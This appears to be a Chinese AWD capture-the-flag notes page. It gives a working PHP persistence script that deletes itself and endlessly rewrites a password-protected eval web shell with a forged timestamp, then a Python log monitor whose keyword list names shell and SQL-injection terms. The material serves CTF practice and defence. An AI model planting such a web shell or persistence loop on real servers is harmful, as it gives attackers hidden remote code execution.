不死马

普通不死马

<?php
    // NOTE(review): AWD "immortal horse" persistence loop as shown on the page.
    // Comments below translate the originals and add what a defender needs to know.
    ignore_user_abort(true);  // keep executing after the client disconnects
    set_time_limit(0);  // no maximum execution time for this script
    unlink(__FILE__);  // deletes its own source file; the PHP worker keeps running, so an absent file on disk does not mean the loop is gone
    $file = '.shell.php';
    $code = '<?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?>';
    //pass=pass
    while (1){
        file_put_contents($file,$code);  // rewrites the file every iteration; removing it by hand is undone almost immediately
        system('touch -m -d "2018-12-01 09:10:12" .shell.php'); // forges mtime only; ctime is still refreshed by the write and the touch, so ctime/inode-based checks and process inspection remain reliable
        usleep(5000);  // 5 ms pause between rewrites
    }
?>

RSA不死马

参考

使用var_dump()分析预置后门

参考

使用var_dump 分析最后字符串的结果

流量监控脚本

参考

#coding=utf-8
##Author: 7i4n2h3n9 & EDS
##Team: Polar Day Cyberspace Security LAB

import os
import sys
import re
import pyinotify

# Set Log Path
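def setHttpserver(log_path=None):
    """Return the path of the HTTP server log to monitor.

    Args:
        log_path: Path to use directly. When None (the default, and the
            original behaviour) the user is prompted for it on stdin.

    Returns:
        The path as a string, once it is verified to be an existing regular file.

    Raises:
        SystemExit: when the path is not an existing regular file. The
            original wrote ``sys.exit`` without calling it, so it fell
            through and returned None to the caller.
    """
    if log_path is None:
        print('Please set the log path of HTTPserver')
        log_path = input('Please input the path:')
    if os.path.isfile(log_path):
        return log_path
    print('File does not exist!')
    print('Exit the program......')
    sys.exit(1)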

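class EventHandler(pyinotify.ProcessEvent):
    """Tail the watched log file and print lines that look suspicious.

    On each IN_MODIFY event everything appended since the previous read is
    consumed; lines containing a dotted-quad IPv4 address (see the regex in
    ``__init__``) are passed to ``check_Log`` and printed when it flags them.
    """

    def __init__(self, file_path, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.file_path = file_path
        # Byte offset of the last read; reset to 0 when the file shrinks
        # (rotation / truncation).
        self._last_position = 0
        # Dotted-quad IPv4 address anywhere in the line.
        logpats = r'((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})(\.((2(5[0-5]|[0-4]\d))|[0-1]?\d{1,2})){3}'
        self._logpat = re.compile(logpats)

    def process_IN_MODIFY(self, event):
        """pyinotify callback: read and scan the newly appended log lines."""
        if self._last_position > os.path.getsize(self.file_path):
            self._last_position = 0
        # Log lines are attacker-controlled (they echo request data); a
        # request containing non-UTF-8 bytes must not crash the monitor,
        # so undecodable bytes are replaced instead of raising.
        with open(self.file_path, errors='replace') as f:
            f.seek(self._last_position)
            loglines = f.readlines()
            self._last_position = f.tell()
        for line in loglines:
            line = line.strip()
            # search() returns None for lines without an IP; the original
            # read ``.string`` on that None and the handler crashed.
            if self._logpat.search(line) is None:
                continue
            if check_Log(line):
                # Printed verbatim: the line is attacker-supplied text.
                print(line)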

def check_Log(strLog):
    """Return True when *strLog* contains any keyword from the watch list.

    The test is a case-insensitive substring search, not a word match, so
    short entries such as "and", "bin" or "sub" also fire inside ordinary
    words ("android", "cabin", "subscribe"). A hit means "look at this
    line", not "this is an attack".
    """
    suspicious = re.search(
        'union|eval|alert|update|insert|into|from|create|delete|drop|truncate|rename|desc|charset|ascii|bin|char|uncompress|concat|concat_ws|conv|export_set|hex|instr|left|load_file|locate|sub|substring|oct|reverse|right|unhex|prompt|fwrite|curl|system|chroot|scandir|chgrp|chown|shell_exec|proc_open|proc_get_status|popen|ini_alter|ini_restore|whoami|bash|phpinfo|msgbox|select|ord|mid|group|and|flag',
        strLog,
        re.I,
    )
    return suspicious is not None

def LogMonitor(path):
    """Watch *path* for IN_MODIFY events and dispatch them to EventHandler.

    Blocks until Ctrl-C; the notifier is stopped before returning.
    NOTE(review): pyinotify's Notifier.loop() appears to handle
    KeyboardInterrupt internally, in which case the retry loop below would
    call loop() again on an already stopped notifier — confirm against the
    installed pyinotify version.
    """
    watch_manager = pyinotify.WatchManager()
    handler = EventHandler(path)
    notifier = pyinotify.Notifier(watch_manager, handler)
    watch_manager.add_watch(handler.file_path, pyinotify.IN_MODIFY)

    print('Now Starting Monitor %s' % path)
    try:
        while True:
            notifier.loop()
    except KeyboardInterrupt:
        notifier.stop()

if __name__ == '__main__':
    # Prompt for the log path, then block in the inotify loop until Ctrl-C.
    LogMonitor(setHttpserver())

一个好奇的人